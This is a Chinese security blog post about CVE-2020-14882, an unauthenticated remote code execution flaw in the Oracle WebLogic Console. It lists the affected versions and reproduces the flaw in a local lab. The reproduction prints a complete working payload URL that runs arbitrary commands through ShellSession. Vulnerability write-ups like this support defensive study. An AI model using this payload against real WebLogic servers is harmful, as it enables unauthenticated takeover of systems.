本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com
点击蓝字 · 关注我们
01
简介:
WebLogic 是美国 Oracle 公司出品的一个 application server,确切的说是一个基于 JAVAEE 架构的中间件,WebLogic 是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的 Java 应用服务器。将 Java 的动态功能和 Java Enterprise 标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
02
漏洞概述
在 Oracle 官方发布的 2020 年 10 月关键补丁更新公告 CPU(Critical Patch Update)中,包含一个存在于 Weblogic Console 中的高危远程代码执行漏洞 CVE-2020-14882。
该漏洞能够在无需身份验证的情况下被触发,影响面较大。
未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET 请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。
官方给出的 CVSS 评分为 9.8。
03
漏洞影响范围
Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
04
漏洞复现
我在本地搭建了 12.2.1.3.0 版本的 weblogic 访问 http://ip:7001/console
环境搭建成功
Payload:
/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27你想执行的命令%27);%22);
回到服务器查看 / tmp 文件夹下 edisec 文件已经创建
说明命令执行成功
EDI 安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号